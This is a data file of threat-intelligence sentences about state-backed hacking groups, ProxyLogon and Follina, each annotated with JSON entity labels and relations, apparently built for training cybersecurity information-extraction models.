[ { "id": 962, "from_id": 50408, "to_id": 50407, "type": "duplicate-of" }, { "id": 963, "from_id": 50407, "to_id": 50409, "type": "attributed-to" }, { "id": 964, "from_id": 50408, "to_id": 50409, "type": "attributed-to" }, { "id": 965, "from_id": 50408, "to_id": 50410, "type": "targets" }, { "id": 966, "from_id": 50407, "to_id": 50410, "type": "targets" } ]
[]
4,573
COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to send credential phishing emails to targets including government and defense officials, politicians, NGOs and think tanks, and journalists.
[ { "id": 50416, "label": "threat-actor", "start_offset": 65, "end_offset": 73 }, { "id": 50415, "label": "threat-actor", "start_offset": 0, "end_offset": 9 }, { "id": 50417, "label": "attack-pattern", "start_offset": 88, "end_offset": 119 } ]
[ { "id": 967, "from_id": 50416, "to_id": 50415, "type": "duplicate-of" }, { "id": 968, "from_id": 50415, "to_id": 50417, "type": "uses" } ]
[]
4,577
Recently observed COLDRIVER indicators: In another campaign tracked by CERT-UA as UAC-0056 we observed compromised email addresses of a Regional Prosecutor’s office of Ukraine leveraged to send malicious Microsoft Excel documents with VBA macros delivering Cobalt Strike.
[ { "id": 50428, "label": "tools", "start_offset": 257, "end_offset": 270 }, { "id": 50424, "label": "identity", "start_offset": 71, "end_offset": 78 }, { "id": 50425, "label": "threat-actor", "start_offset": 82, "end_offset": 90 }, { "id": 50427, "label": "SOFTWARE", "start_offset": 204, "end_offset": 219 }, { "id": 50423, "label": "threat-actor", "start_offset": 18, "end_offset": 27 }, { "id": 50426, "label": "identity", "start_offset": 136, "end_offset": 175 } ]
[ { "id": 969, "from_id": 50423, "to_id": 50425, "type": "duplicate-of" }, { "id": 970, "from_id": 50423, "to_id": 50426, "type": "impersonates" } ]
[]
4,585
In March 2021, Microsoft kicked off the patch cycle early after releasing an advisory regarding the mass exploitation of four zero-days vulnerabilities by a Chinese Hacking group, HAFNIUM, on the on-premises versions of the Microsoft Exchange Server.
[ { "id": 50436, "label": "TIME", "start_offset": 3, "end_offset": 13 }, { "id": 50437, "label": "identity", "start_offset": 15, "end_offset": 24 }, { "id": 50438, "label": "vulnerability", "start_offset": 126, "end_offset": 151 }, { "id": 50439, "label": "threat-actor", "start_offset": 180, "end_offset": 187 }, { "id": 50440, "label": "location", "start_offset": 157, "end_offset": 164 }, { "id": 50441, "label": "SOFTWARE", "start_offset": 196, "end_offset": 249 } ]
[ { "id": 971, "from_id": 50439, "to_id": 50440, "type": "located-at" }, { "id": 972, "from_id": 50439, "to_id": 50438, "type": "exploits" }, { "id": 973, "from_id": 50441, "to_id": 50438, "type": "has" } ]
[]
4,587
The vulnerability has been dubbed as ProxyLogon by the researchers at DEVCORE, who are credited with finding the bugs in the proxy architecture and the logon mechanism of Exchange.
[ { "id": 50446, "label": "SOFTWARE", "start_offset": 172, "end_offset": 180 }, { "id": 50444, "label": "vulnerability", "start_offset": 38, "end_offset": 48 }, { "id": 50445, "label": "identity", "start_offset": 71, "end_offset": 78 } ]
[ { "id": 974, "from_id": 50446, "to_id": 50444, "type": "has" } ]
[]
4,591
According to Shodan, on March 4, there were more than 266,000 Exchange Servers vulnerable to the ProxyLogon vulnerability, a day after the patch was released.
[ { "id": 50465, "label": "TIME", "start_offset": 24, "end_offset": 31 }, { "id": 50464, "label": "identity", "start_offset": 13, "end_offset": 19 }, { "id": 50466, "label": "SOFTWARE", "start_offset": 62, "end_offset": 78 }, { "id": 50467, "label": "vulnerability", "start_offset": 97, "end_offset": 121 } ]
[ { "id": 976, "from_id": 50466, "to_id": 50467, "type": "has" } ]
[]
4,596
CVE-2021-26855: Microsoft Exchange Server Remote Code Execution Vulnerability (pre-authenticated Server-Side Request Forgery [SSRF]) CVE-2021-27065: Microsoft Exchange Server Remote Code Execution Vulnerability (post-authenticated Arbitrary File Write) Fig - MS Exchange Client Access Protocol Architecture The Client Access services (Outlook Web App portal) proxies the incoming connections to the Backend services.
[ { "id": 50475, "label": "vulnerability", "start_offset": 3, "end_offset": 17 }, { "id": 50478, "label": "vulnerability", "start_offset": 152, "end_offset": 213 }, { "id": 50476, "label": "vulnerability", "start_offset": 19, "end_offset": 80 }, { "id": 50477, "label": "vulnerability", "start_offset": 136, "end_offset": 150 } ]
[ { "id": 977, "from_id": 50476, "to_id": 50475, "type": "duplicate-of" }, { "id": 978, "from_id": 50478, "to_id": 50477, "type": "duplicate-of" } ]
[]
4,603
Workload Security uses advanced security controls such as intrusion prevention system (IPS), deep packet inspection (DPI), and integrity monitoring to protect Exchange Servers from attackers that could exploit ProxyLogon.
[ { "id": 50494, "label": "SOFTWARE", "start_offset": 159, "end_offset": 175 }, { "id": 50493, "label": "vulnerability", "start_offset": 210, "end_offset": 220 } ]
[ { "id": 979, "from_id": 50494, "to_id": 50493, "type": "has" } ]
[]
4,626
As part of TAG's mission to counter serious threats to Google and our users, we've analyzed a range of persistent threats including APT35 and Charming Kitten, an Iranian government-backed group that regularly targets high risk users.
[ { "id": 50537, "label": "identity", "start_offset": 55, "end_offset": 61 }, { "id": 50538, "label": "threat-actor", "start_offset": 132, "end_offset": 137 }, { "id": 50539, "label": "threat-actor", "start_offset": 142, "end_offset": 157 }, { "id": 50540, "label": "location", "start_offset": 162, "end_offset": 169 }, { "id": 50536, "label": "identity", "start_offset": 11, "end_offset": 14 } ]
[ { "id": 980, "from_id": 50538, "to_id": 50540, "type": "located-at" }, { "id": 981, "from_id": 50539, "to_id": 50540, "type": "located-at" } ]
[]
4,629
In December 2021, TAG discovered a novel Charming Kitten tool, named HYPERSCRAPE, used to steal user data from Gmail, Yahoo!, and Microsoft Outlook accounts.
[ { "id": 50543, "label": "identity", "start_offset": 18, "end_offset": 21 }, { "id": 50544, "label": "threat-actor", "start_offset": 41, "end_offset": 56 }, { "id": 50545, "label": "malware", "start_offset": 69, "end_offset": 80 }, { "id": 50546, "label": "SOFTWARE", "start_offset": 111, "end_offset": 116 }, { "id": 50542, "label": "TIME", "start_offset": 3, "end_offset": 16 }, { "id": 50547, "label": "SOFTWARE", "start_offset": 118, "end_offset": 124 }, { "id": 50548, "label": "SOFTWARE", "start_offset": 130, "end_offset": 147 } ]
[ { "id": 982, "from_id": 50545, "to_id": 50544, "type": "authored-by" } ]
[]
4,728
Most recently, we reported in May on five zero-day vulnerabilities affecting Chrome and Android which were used to compromise Android users.
[ { "id": 50632, "label": "SOFTWARE", "start_offset": 77, "end_offset": 83 }, { "id": 50633, "label": "SOFTWARE", "start_offset": 88, "end_offset": 95 }, { "id": 50634, "label": "SOFTWARE", "start_offset": 126, "end_offset": 133 }, { "id": 50635, "label": "vulnerability", "start_offset": 37, "end_offset": 66 } ]
[ { "id": 983, "from_id": 50632, "to_id": 50635, "type": "has" }, { "id": 984, "from_id": 50633, "to_id": 50635, "type": "has" }, { "id": 985, "from_id": 50634, "to_id": 50635, "type": "has" } ]
[]
4,800
Many Russian government cyber assets have remained focused on Ukraine and related issues since the invasion began, while Russian APT activity outside of Ukraine largely remains the same.
[ { "id": 50702, "label": "location", "start_offset": 62, "end_offset": 69 }, { "id": 50703, "label": "threat-actor", "start_offset": 121, "end_offset": 132 }, { "id": 50704, "label": "location", "start_offset": 153, "end_offset": 160 }, { "id": 50701, "label": "threat-actor", "start_offset": 5, "end_offset": 36 } ]
[ { "id": 986, "from_id": 50701, "to_id": 50702, "type": "targets" } ]
[]
4,802
Similarly, Russian observed disinformation efforts are also focused on the war in Ukraine and TAG has disrupted coordinated influence operations from several actors including the Internet Research Agency and a Russian consulting firm as detailed in the TAG Bulletin.
[ { "id": 50710, "label": "threat-actor", "start_offset": 179, "end_offset": 203 }, { "id": 50707, "label": "identity", "start_offset": 94, "end_offset": 97 }, { "id": 50709, "label": "attack-pattern", "start_offset": 28, "end_offset": 42 }, { "id": 50711, "label": "threat-actor", "start_offset": 210, "end_offset": 233 }, { "id": 50706, "label": "location", "start_offset": 82, "end_offset": 89 }, { "id": 50708, "label": "location", "start_offset": 11, "end_offset": 18 }, { "id": 50712, "label": "identity", "start_offset": 253, "end_offset": 256 } ]
[ { "id": 987, "from_id": 50710, "to_id": 50709, "type": "uses" }, { "id": 988, "from_id": 50711, "to_id": 50709, "type": "uses" }, { "id": 989, "from_id": 50710, "to_id": 50708, "type": "located-at" }, { "id": 990, "from_id": 50711, "to_id": 50708, "type": "located-at" }, { "id": 991, "from_id": 50710, "to_id": 50706, "type": "targets" }, { "id": 992, "from_id": 50711, "to_id": 50706, "type": "targets" } ]
[]
4,804
Here is a deeper look at some campaign activity TAG has observed since our last update: Turla, a group publicly attributed to Russia’s Federal Security Service (FSB), recently hosted Android apps on a domain spoofing the Ukrainian Azov Regiment.
[ { "id": 50714, "label": "identity", "start_offset": 48, "end_offset": 51 }, { "id": 50715, "label": "threat-actor", "start_offset": 88, "end_offset": 93 }, { "id": 50719, "label": "SOFTWARE", "start_offset": 183, "end_offset": 190 }, { "id": 50716, "label": "location", "start_offset": 126, "end_offset": 132 }, { "id": 50717, "label": "identity", "start_offset": 135, "end_offset": 165 }, { "id": 50718, "label": "identity", "start_offset": 221, "end_offset": 244 } ]
[ { "id": 994, "from_id": 50717, "to_id": 50716, "type": "located-at" }, { "id": 995, "from_id": 50715, "to_id": 50717, "type": "attributed-to" }, { "id": 996, "from_id": 50715, "to_id": 50718, "type": "impersonates" }, { "id": 997, "from_id": 50715, "to_id": 50719, "type": "uses" } ]
[]
4,811
During our investigation into the Turla CyberAzov apps, we identified another Android app first seen in the wild in March 2022 that also claimed to conduct DoS attacks against Russian websites.
[ { "id": 50729, "label": "SOFTWARE", "start_offset": 78, "end_offset": 89 }, { "id": 50730, "label": "TIME", "start_offset": 116, "end_offset": 126 }, { "id": 50731, "label": "attack-pattern", "start_offset": 156, "end_offset": 159 }, { "id": 50727, "label": "threat-actor", "start_offset": 34, "end_offset": 39 }, { "id": 50728, "label": "malware", "start_offset": 40, "end_offset": 49 } ]
[ { "id": 998, "from_id": 50727, "to_id": 50728, "type": "uses" } ]
[]
4,812
In this case, the Android app name was stopwar.apk (com.ddos.stopwar) and was distributed from the website stopwar.pro.
[ { "id": 50733, "label": "malware", "start_offset": 39, "end_offset": 50 }, { "id": 50732, "label": "SOFTWARE", "start_offset": 18, "end_offset": 29 }, { "id": 50734, "label": "malware", "start_offset": 52, "end_offset": 68 }, { "id": 50735, "label": "DOMAIN", "start_offset": 107, "end_offset": 118 } ]
[ { "id": 999, "from_id": 50735, "to_id": 50734, "type": "hosts" }, { "id": 1000, "from_id": 50735, "to_id": 50733, "type": "hosts" } ]
[]
4,815
Based on our analysis, we believe that the StopWar app was developed by pro-Ukrainian developers and was the inspiration for what Turla actors based their fake CyberAzov DoS app off of.
[ { "id": 50738, "label": "SOFTWARE", "start_offset": 43, "end_offset": 54 }, { "id": 50740, "label": "malware", "start_offset": 155, "end_offset": 177 }, { "id": 50739, "label": "threat-actor", "start_offset": 130, "end_offset": 135 } ]
[ { "id": 1001, "from_id": 50740, "to_id": 50738, "type": "impersonates" }, { "id": 1003, "from_id": 50740, "to_id": 50739, "type": "authored-by" } ]
[]
4,817
Follina is a remote code execution (RCE) vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT).
[ { "id": 50748, "label": "SOFTWARE", "start_offset": 62, "end_offset": 110 }, { "id": 50746, "label": "vulnerability", "start_offset": 13, "end_offset": 54 }, { "id": 50747, "label": "vulnerability", "start_offset": 0, "end_offset": 7 } ]
[ { "id": 1004, "from_id": 50746, "to_id": 50747, "type": "duplicate-of" }, { "id": 1005, "from_id": 50748, "to_id": 50747, "type": "has" } ]
[]
4,818
Consistent with CERT-UA reporting, TAG observed multiple Russian GRU actors - APT28 and Sandworm - conduct campaigns exploiting the Follina vulnerability.
[ { "id": 50750, "label": "identity", "start_offset": 35, "end_offset": 38 }, { "id": 50751, "label": "identity", "start_offset": 57, "end_offset": 75 }, { "id": 50752, "label": "threat-actor", "start_offset": 78, "end_offset": 83 }, { "id": 50753, "label": "threat-actor", "start_offset": 88, "end_offset": 96 }, { "id": 50749, "label": "identity", "start_offset": 16, "end_offset": 23 }, { "id": 50754, "label": "vulnerability", "start_offset": 132, "end_offset": 153 } ]
[ { "id": 1006, "from_id": 50753, "to_id": 50754, "type": "exploits" }, { "id": 1007, "from_id": 50752, "to_id": 50754, "type": "exploits" } ]
[]
4,821
One recent campaign from a group tracked by CERT-UA as UAC-0098 delivered malicious documents with the Follina exploit in password-protected archives, impersonating the State Tax Service of Ukraine.
[ { "id": 50760, "label": "identity", "start_offset": 44, "end_offset": 51 }, { "id": 50761, "label": "threat-actor", "start_offset": 55, "end_offset": 63 }, { "id": 50762, "label": "vulnerability", "start_offset": 103, "end_offset": 118 }, { "id": 50763, "label": "identity", "start_offset": 169, "end_offset": 197 } ]
[ { "id": 1008, "from_id": 50761, "to_id": 50763, "type": "impersonates" }, { "id": 1009, "from_id": 50761, "to_id": 50762, "type": "uses" } ]
[]
4,822
We assess this actor is a former initial ransomware access broker who previously worked with the Conti ransomware group distributing the IcedID banking trojan based on overlaps in infrastructure, tools used in previous campaigns, and a unique cryptor.
[ { "id": 50765, "label": "malware", "start_offset": 137, "end_offset": 158 }, { "id": 50764, "label": "threat-actor", "start_offset": 97, "end_offset": 102 } ]
[ { "id": 1010, "from_id": 50764, "to_id": 50765, "type": "uses" } ]
[]
4,823
Ghostwriter/UNC1151, a threat actor attributed to Belarus, has remained active targeting accounts of webmail and social media networks of Polish users.
[ { "id": 50766, "label": "threat-actor", "start_offset": 0, "end_offset": 11 }, { "id": 50767, "label": "threat-actor", "start_offset": 12, "end_offset": 19 }, { "id": 50768, "label": "location", "start_offset": 50, "end_offset": 57 } ]
[ { "id": 1011, "from_id": 50767, "to_id": 50766, "type": "duplicate-of" }, { "id": 1012, "from_id": 50766, "to_id": 50768, "type": "attributed-to" } ]
[]
4,826
COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to send credential phishing emails to targets including government and defense officials, politicians, NGOs and think tanks, and journalists.
[ { "id": 50774, "label": "location", "start_offset": 13, "end_offset": 20 }, { "id": 50775, "label": "threat-actor", "start_offset": 65, "end_offset": 73 }, { "id": 50773, "label": "threat-actor", "start_offset": 0, "end_offset": 9 }, { "id": 50776, "label": "attack-pattern", "start_offset": 93, "end_offset": 119 } ]
[ { "id": 1013, "from_id": 50773, "to_id": 50774, "type": "located-at" }, { "id": 1014, "from_id": 50775, "to_id": 50773, "type": "duplicate-of" } ]
[]
4,830
Recently observed COLDRIVER indicators: In another campaign tracked by CERT-UA as UAC-0056 we observed compromised email addresses of a Regional Prosecutor’s office of Ukraine leveraged to send malicious Microsoft Excel documents with VBA macros delivering Cobalt Strike.
[ { "id": 50783, "label": "identity", "start_offset": 71, "end_offset": 78 }, { "id": 50785, "label": "SOFTWARE", "start_offset": 204, "end_offset": 219 }, { "id": 50786, "label": "tools", "start_offset": 257, "end_offset": 270 }, { "id": 50784, "label": "identity", "start_offset": 136, "end_offset": 175 }, { "id": 14710, "label": "threat-actor", "start_offset": 18, "end_offset": 27 }, { "id": 14713, "label": "threat-actor", "start_offset": 82, "end_offset": 90 } ]
[ { "id": 1015, "from_id": 14713, "to_id": 14710, "type": "duplicate-of" }, { "id": 1016, "from_id": 14710, "to_id": 50784, "type": "targets" }, { "id": 1017, "from_id": 14710, "to_id": 50785, "type": "uses" }, { "id": 1018, "from_id": 14710, "to_id": 50786, "type": "uses" } ]
[]
4,845
We have also observed Indian hack-for-hire firms work with freelance actors not directly employed by the firms themselves.
[ { "id": 50804, "label": "location", "start_offset": 22, "end_offset": 28 }, { "id": 50805, "label": "identity", "start_offset": 29, "end_offset": 48 } ]
[ { "id": 1019, "from_id": 50805, "to_id": 50804, "type": "located-at" } ]
[]
4,847
A recent campaign from an Indian hack-for-hire operator was observed targeting an IT company in Cyprus, an education institution in Nigeria, a fintech company in the Balkans and a shopping company in Israel.
[ { "id": 50812, "label": "location", "start_offset": 200, "end_offset": 206 }, { "id": 50809, "label": "location", "start_offset": 96, "end_offset": 102 }, { "id": 50807, "label": "location", "start_offset": 26, "end_offset": 32 }, { "id": 50808, "label": "identity", "start_offset": 33, "end_offset": 55 }, { "id": 50810, "label": "location", "start_offset": 132, "end_offset": 139 }, { "id": 50811, "label": "location", "start_offset": 166, "end_offset": 173 } ]
[ { "id": 1020, "from_id": 50808, "to_id": 50807, "type": "located-at" }, { "id": 1021, "from_id": 50808, "to_id": 50809, "type": "targets" }, { "id": 1023, "from_id": 50808, "to_id": 50811, "type": "targets" }, { "id": 1024, "from_id": 50808, "to_id": 50812, "type": "targets" }, { "id": 1022, "from_id": 50808, "to_id": 50810, "type": "targets" } ]
[]
4,850
One cluster of this activity frequently targets government, healthcare, and telecom sectors in Saudi Arabia, the United Arab Emirates, and Bahrain with credential phishing campaigns.
[ { "id": 50820, "label": "location", "start_offset": 95, "end_offset": 107 }, { "id": 50821, "label": "location", "start_offset": 113, "end_offset": 133 }, { "id": 50822, "label": "location", "start_offset": 139, "end_offset": 146 }, { "id": 50823, "label": "campaign", "start_offset": 152, "end_offset": 181 } ]
[ { "id": 1025, "from_id": 50823, "to_id": 50822, "type": "targets" }, { "id": 1026, "from_id": 50823, "to_id": 50820, "type": "targets" }, { "id": 1027, "from_id": 50823, "to_id": 50821, "type": "targets" } ]
[]
4,872
This group also has links to the original developers of H-Worm, also known as njRAT.
[ { "id": 50874, "label": "malware", "start_offset": 56, "end_offset": 62 }, { "id": 14895, "label": "malware", "start_offset": 78, "end_offset": 83 } ]
[ { "id": 1028, "from_id": 14895, "to_id": 50874, "type": "duplicate-of" } ]
[]
4,873
In 2014, Microsoft filed a civil suit against the developer, Mohammed Benabdellah, for the development and dissemination of H-Worm.
[ { "id": 50875, "label": "TIME", "start_offset": 3, "end_offset": 7 }, { "id": 50877, "label": "identity", "start_offset": 61, "end_offset": 81 }, { "id": 50878, "label": "malware", "start_offset": 124, "end_offset": 130 }, { "id": 50876, "label": "identity", "start_offset": 9, "end_offset": 18 } ]
[ { "id": 1029, "from_id": 50878, "to_id": 50877, "type": "authored-by" } ]
[]
4,874
Benabdellah, who also goes by the moniker Houdini, has been actively involved in the day-to-day development and operational deployment of the credential phishing capabilities used by this group since its inception.
[ { "id": 50881, "label": "attack-pattern", "start_offset": 142, "end_offset": 161 }, { "id": 50879, "label": "identity", "start_offset": 0, "end_offset": 11 }, { "id": 50880, "label": "identity", "start_offset": 42, "end_offset": 49 } ]
[ { "id": 1030, "from_id": 50880, "to_id": 50879, "type": "duplicate-of" } ]
[]
4,908
Some commodity malware used included RedLine, Vidar, Predator The Thief, Nexus stealer, Azorult, Raccoon, Grand Stealer, Vikro Stealer, Masad (Google’s naming), and Kantal (Google’s naming) which shares code similarity with Vidar.
[ { "id": 50930, "label": "malware", "start_offset": 106, "end_offset": 119 }, { "id": 50931, "label": "malware", "start_offset": 121, "end_offset": 134 }, { "id": 50925, "label": "malware", "start_offset": 53, "end_offset": 71 }, { "id": 50926, "label": "malware", "start_offset": 73, "end_offset": 86 }, { "id": 50927, "label": "malware", "start_offset": 88, "end_offset": 95 }, { "id": 50928, "label": "malware", "start_offset": 97, "end_offset": 104 }, { "id": 50932, "label": "malware", "start_offset": 136, "end_offset": 141 }, { "id": 50933, "label": "malware", "start_offset": 165, "end_offset": 171 }, { "id": 50934, "label": "malware", "start_offset": 224, "end_offset": 229 }, { "id": 50923, "label": "malware", "start_offset": 37, "end_offset": 44 }, { "id": 50924, "label": "malware", "start_offset": 46, "end_offset": 51 } ]
[ { "id": 1032, "from_id": 50933, "to_id": 50934, "type": "variant-of" } ]
[]
4,930
In this blog, we explore some of the most notable campaigns we’ve disrupted this year from a different government-backed attacker: APT35, an Iranian group, which regularly conducts phishing campaigns targeting high risk users.
[ { "id": 50945, "label": "threat-actor", "start_offset": 131, "end_offset": 136 }, { "id": 50947, "label": "location", "start_offset": 141, "end_offset": 148 } ]
[ { "id": 1033, "from_id": 50945, "to_id": 50947, "type": "located-at" } ]
[]
4,979
We assess that these campaigns delivered ALIEN, a simple Android malware in charge of loading PREDATOR, an Android implant described by CitizenLab in December 2021.
[ { "id": 51036, "label": "TIME", "start_offset": 150, "end_offset": 163 }, { "id": 51034, "label": "malware", "start_offset": 94, "end_offset": 102 }, { "id": 51035, "label": "identity", "start_offset": 136, "end_offset": 146 }, { "id": 15307, "label": "malware", "start_offset": 41, "end_offset": 46 } ]
[ { "id": 1034, "from_id": 15307, "to_id": 51034, "type": "drops" } ]
[]
5,017
Here is a deeper look at the campaign activity TAG has observed and the actions the team has taken to protect our users over the past few weeks: APT28 or Fancy Bear, a threat actor attributed to Russia GRU, was observed targeting users in Ukraine with a new variant of malware.
[ { "id": 51078, "label": "location", "start_offset": 239, "end_offset": 246 }, { "id": 51074, "label": "identity", "start_offset": 47, "end_offset": 50 }, { "id": 51075, "label": "threat-actor", "start_offset": 145, "end_offset": 150 }, { "id": 51076, "label": "threat-actor", "start_offset": 154, "end_offset": 164 }, { "id": 51077, "label": "identity", "start_offset": 195, "end_offset": 205 } ]
[ { "id": 1035, "from_id": 51076, "to_id": 51075, "type": "duplicate-of" }, { "id": 1036, "from_id": 51075, "to_id": 51077, "type": "attributed-to" }, { "id": 1037, "from_id": 51075, "to_id": 51078, "type": "targets" } ]
[]
5,022
Turla, a group TAG attributes to Russia FSB, continues to run campaigns against the Baltics, targeting defense and cybersecurity organizations in the region.
[ { "id": 51087, "label": "identity", "start_offset": 15, "end_offset": 18 }, { "id": 51086, "label": "threat-actor", "start_offset": 0, "end_offset": 5 }, { "id": 51088, "label": "identity", "start_offset": 33, "end_offset": 43 }, { "id": 51089, "label": "location", "start_offset": 84, "end_offset": 91 } ]
[ { "id": 1038, "from_id": 51086, "to_id": 51088, "type": "attributed-to" }, { "id": 1039, "from_id": 51086, "to_id": 51089, "type": "targets" } ]
[]
5,025
Recently observed Turla domains: COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to use Gmail accounts to send credential phishing emails to a variety of Google and non-Google accounts.
[ { "id": 51091, "label": "threat-actor", "start_offset": 33, "end_offset": 42 }, { "id": 51092, "label": "threat-actor", "start_offset": 98, "end_offset": 106 }, { "id": 51093, "label": "SOFTWARE", "start_offset": 125, "end_offset": 130 }, { "id": 51094, "label": "identity", "start_offset": 191, "end_offset": 197 }, { "id": 51090, "label": "threat-actor", "start_offset": 18, "end_offset": 23 } ]
[ { "id": 1040, "from_id": 51092, "to_id": 51091, "type": "duplicate-of" }, { "id": 1041, "from_id": 51091, "to_id": 51093, "type": "uses" }, { "id": 1042, "from_id": 51091, "to_id": 51094, "type": "targets" } ]
[]
5,030
Recently observed COLDRIVER credential phishing domains: Ghostwriter, a Belarusian threat actor, has remained active during the course of the war and recently resumed targeting of Gmail accounts via credential phishing.
[ { "id": 51098, "label": "threat-actor", "start_offset": 18, "end_offset": 27 }, { "id": 51100, "label": "location", "start_offset": 72, "end_offset": 82 }, { "id": 51101, "label": "SOFTWARE", "start_offset": 180, "end_offset": 185 }, { "id": 51102, "label": "attack-pattern", "start_offset": 199, "end_offset": 218 }, { "id": 51099, "label": "threat-actor", "start_offset": 57, "end_offset": 68 } ]
[ { "id": 1043, "from_id": 51099, "to_id": 51100, "type": "located-at" }, { "id": 1044, "from_id": 51099, "to_id": 51101, "type": "uses" }, { "id": 1045, "from_id": 51099, "to_id": 51102, "type": "uses" } ]
[]
5,037
Recently observed Ghostwriter credential phishing domains and emails: Curious Gorge, a group TAG attributes to China's PLA SSF, has remained active against government, military, logistics and manufacturing organizations in Ukraine, Russia and Central Asia.
[ { "id": 51116, "label": "location", "start_offset": 232, "end_offset": 238 }, { "id": 51117, "label": "location", "start_offset": 243, "end_offset": 255 }, { "id": 51113, "label": "identity", "start_offset": 93, "end_offset": 96 }, { "id": 51115, "label": "location", "start_offset": 223, "end_offset": 230 }, { "id": 51112, "label": "threat-actor", "start_offset": 70, "end_offset": 83 }, { "id": 51111, "label": "threat-actor", "start_offset": 18, "end_offset": 29 }, { "id": 51114, "label": "identity", "start_offset": 111, "end_offset": 126 } ]
[ { "id": 1046, "from_id": 51112, "to_id": 51114, "type": "attributed-to" }, { "id": 1047, "from_id": 51112, "to_id": 51115, "type": "targets" }, { "id": 1048, "from_id": 51112, "to_id": 51116, "type": "targets" }, { "id": 1049, "from_id": 51112, "to_id": 51117, "type": "targets" } ]
[]
5,054
Here is a deeper look at the campaign activity TAG has observed over the past two weeks: Curious Gorge, a group TAG attributes to China's PLA SSF, has conducted campaigns against government and military organizations in Ukraine, Russia, Kazakhstan, and Mongolia.
[ { "id": 51145, "label": "location", "start_offset": 220, "end_offset": 227 }, { "id": 51148, "label": "location", "start_offset": 253, "end_offset": 261 }, { "id": 51149, "label": "identity", "start_offset": 179, "end_offset": 216 }, { "id": 51141, "label": "identity", "start_offset": 47, "end_offset": 50 }, { "id": 51142, "label": "threat-actor", "start_offset": 89, "end_offset": 102 }, { "id": 51143, "label": "identity", "start_offset": 112, "end_offset": 115 }, { "id": 51144, "label": "identity", "start_offset": 130, "end_offset": 145 }, { "id": 51146, "label": "location", "start_offset": 229, "end_offset": 235 }, { "id": 51147, "label": "location", "start_offset": 237, "end_offset": 247 } ]
[ { "id": 1050, "from_id": 51142, "to_id": 51144, "type": "attributed-to" }, { "id": 1051, "from_id": 51142, "to_id": 51149, "type": "targets" }, { "id": 1052, "from_id": 51142, "to_id": 51145, "type": "targets" }, { "id": 1053, "from_id": 51142, "to_id": 51146, "type": "targets" }, { "id": 1054, "from_id": 51142, "to_id": 51147, "type": "targets" }, { "id": 1055, "from_id": 51142, "to_id": 51148, "type": "targets" } ]
[]
5,056
Recently observed IPs used in Curious Gorge campaigns: COLDRIVER, a Russian-based threat actor sometimes referred to as Calisto, has launched credential phishing campaigns, targeting several US based NGOs and think tanks, the military of a Balkans country, and a Ukraine based defense contractor.
[ { "id": 51151, "label": "threat-actor", "start_offset": 30, "end_offset": 43 }, { "id": 51152, "label": "threat-actor", "start_offset": 55, "end_offset": 64 }, { "id": 51153, "label": "location", "start_offset": 68, "end_offset": 75 }, { "id": 51154, "label": "threat-actor", "start_offset": 120, "end_offset": 127 }, { "id": 51155, "label": "attack-pattern", "start_offset": 142, "end_offset": 171 }, { "id": 51157, "label": "identity", "start_offset": 226, "end_offset": 255 }, { "id": 51158, "label": "identity", "start_offset": 263, "end_offset": 295 }, { "id": 51156, "label": "identity", "start_offset": 191, "end_offset": 220 } ]
[ { "id": 1056, "from_id": 51152, "to_id": 51153, "type": "located-at" }, { "id": 1057, "from_id": 51154, "to_id": 51152, "type": "duplicate-of" }, { "id": 1058, "from_id": 51152, "to_id": 51155, "type": "uses" }, { "id": 1059, "from_id": 51152, "to_id": 51156, "type": "targets" }, { "id": 1060, "from_id": 51152, "to_id": 51157, "type": "targets" }, { "id": 1061, "from_id": 51152, "to_id": 51158, "type": "targets" } ]
[]
5,057
However, for the first time, TAG has observed COLDRIVER campaigns targeting the military of multiple Eastern European countries, as well as a NATO Centre of Excellence.
[ { "id": 51162, "label": "identity", "start_offset": 142, "end_offset": 167 }, { "id": 51159, "label": "identity", "start_offset": 29, "end_offset": 32 }, { "id": 51160, "label": "threat-actor", "start_offset": 46, "end_offset": 55 }, { "id": 51161, "label": "identity", "start_offset": 101, "end_offset": 127 } ]
[ { "id": 1062, "from_id": 51160, "to_id": 51161, "type": "targets" }, { "id": 1063, "from_id": 51160, "to_id": 51162, "type": "targets" } ]
[]
5,060
Recently observed COLDRIVER credential phishing domains: Ghostwriter, a Belarusian threat actor, recently introduced a new capability into their credential phishing campaigns.
[ { "id": 51165, "label": "location", "start_offset": 72, "end_offset": 82 }, { "id": 51166, "label": "campaign", "start_offset": 145, "end_offset": 174 }, { "id": 15621, "label": "threat-actor", "start_offset": 18, "end_offset": 27 }, { "id": 15623, "label": "threat-actor", "start_offset": 57, "end_offset": 68 } ]
[ { "id": 1064, "from_id": 15623, "to_id": 51165, "type": "located-at" }, { "id": 1065, "from_id": 15623, "to_id": 51166, "type": "uses" } ]
[]
5,063
Ghostwriter actors have quickly adopted this new technique, combining it with a previously observed technique, hosting credential phishing landing pages on compromised sites.
[ { "id": 51170, "label": "attack-pattern", "start_offset": 111, "end_offset": 173 }, { "id": 51169, "label": "threat-actor", "start_offset": 0, "end_offset": 11 } ]
[ { "id": 1066, "from_id": 51169, "to_id": 51170, "type": "uses" } ]
[]
5,066
Recently observed Ghostwriter credential phishing domains:
[ { "id": 51172, "label": "threat-actor", "start_offset": 18, "end_offset": 29 }, { "id": 51173, "label": "attack-pattern", "start_offset": 30, "end_offset": 49 } ]
[ { "id": 1067, "from_id": 51172, "to_id": 51173, "type": "uses" } ]
[]
5,070
On February 10, Threat Analysis Group discovered two distinct North Korean government-backed attacker groups exploiting a remote code execution vulnerability in Chrome, CVE-2022-0609.
[ { "id": 51176, "label": "TIME", "start_offset": 3, "end_offset": 14 }, { "id": 51177, "label": "identity", "start_offset": 16, "end_offset": 37 }, { "id": 51178, "label": "threat-actor", "start_offset": 62, "end_offset": 108 }, { "id": 51179, "label": "vulnerability", "start_offset": 122, "end_offset": 157 }, { "id": 51180, "label": "vulnerability", "start_offset": 169, "end_offset": 182 }, { "id": 51181, "label": "SOFTWARE", "start_offset": 161, "end_offset": 167 } ]
[ { "id": 1068, "from_id": 51179, "to_id": 51180, "type": "duplicate-of" }, { "id": 1069, "from_id": 51181, "to_id": 51180, "type": "has" }, { "id": 1070, "from_id": 51178, "to_id": 51180, "type": "exploits" } ]
[]
5,108
&amp;nbsp; [Lightly edited transcript of the video above] Hi there, Mark Nunnikhoven from Trend Micro Research, I want to talk to you about the concept of lateral movement.
